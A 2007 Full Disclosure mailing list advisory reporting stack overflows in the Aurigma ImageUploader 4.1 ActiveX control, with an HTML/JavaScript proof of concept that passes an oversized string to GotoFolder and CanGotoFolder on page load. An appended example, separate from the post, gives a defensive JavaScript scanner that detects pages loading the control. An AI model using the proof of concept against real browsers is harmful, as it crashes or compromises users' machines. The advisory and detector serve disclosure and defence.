Full Disclosure mailing list archives
Aurigma ImageUploader 4.1 Multiple stack overflows
From: Elazar Broad <elazarb () earthlink net>
Date: Wed, 21 Nov 2007 21:55:32 -0500 (GMT-05:00)
There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX control. I believe this control was installed by www.dotphoto.com. PoC as follows:

-----------------------
<!-- written by e.b. -->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
    var s = "AAAA";
    while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}

    obj.GotoFolder(s);
    obj.CanGotoFolder(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
-----------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
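A defender-side check for the control this advisory names, as an added example that is not part of the original post: it scans page source for the ProgID and CLSID shown in the PoC and for the two affected methods, so that pages loading the control can be found and reviewed. The function name, rule set and sample page are assumptions constructed for illustration.

```javascript
// Added example: static check for pages that load the Aurigma ImageUploader 4.1 control.
// ProgID, CLSID and method names are taken from the advisory; everything else is illustrative.
const PROGID = "Aurigma.ImageUploader.4.1";
const CLSID = "6E5E167B-1566-4316-B27F-0DDAB3484CF7";
const METHODS = ["GotoFolder", "CanGotoFolder"];

// Escape regex metacharacters so the ProgID's dots match literally.
const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

const RULES = [
  // new ActiveXObject("Aurigma.ImageUploader.4.1"), either quote style, any spacing
  { kind: "progid", re: new RegExp("ActiveXObject\\s*\\(\\s*[\"']" + escapeRe(PROGID) + "[\"']", "i") },
  // <object classid="clsid:..."> or the bare GUID, with or without braces, any case
  { kind: "clsid", re: new RegExp("\\{?" + CLSID + "\\}?", "i") },
  // calls to the two methods the advisory names
  { kind: "method", re: new RegExp("\\.(" + METHODS.join("|") + ")\\s*\\(") },
];

// Returns [{ line, kind, match }] for every rule that fires on a line of the page source.
function findControlReferences(html) {
  const hits = [];
  html.split(/\r?\n/).forEach((text, i) => {
    for (const { kind, re } of RULES) {
      const m = re.exec(text);
      if (m) hits.push({ line: i + 1, kind, match: m[0] });
    }
  });
  // The method names alone are too generic; report them only when the page loads the control.
  const loadsControl = hits.some((h) => h.kind !== "method");
  return loadsControl ? hits : [];
}

// Constructed sample page (not from the advisory).
const SAMPLE = [
  "<html><body>",
  '<object id="up" classid="clsid:6e5e167b-1566-4316-b27f-0ddab3484cf7"></object>',
  "<script>",
  "var obj = new ActiveXObject( 'Aurigma.ImageUploader.4.1' );",
  "obj.GotoFolder(userSuppliedPath);",
  "</script>",
  "</body></html>",
].join("\n");

console.log(findControlReferences(SAMPLE));
```
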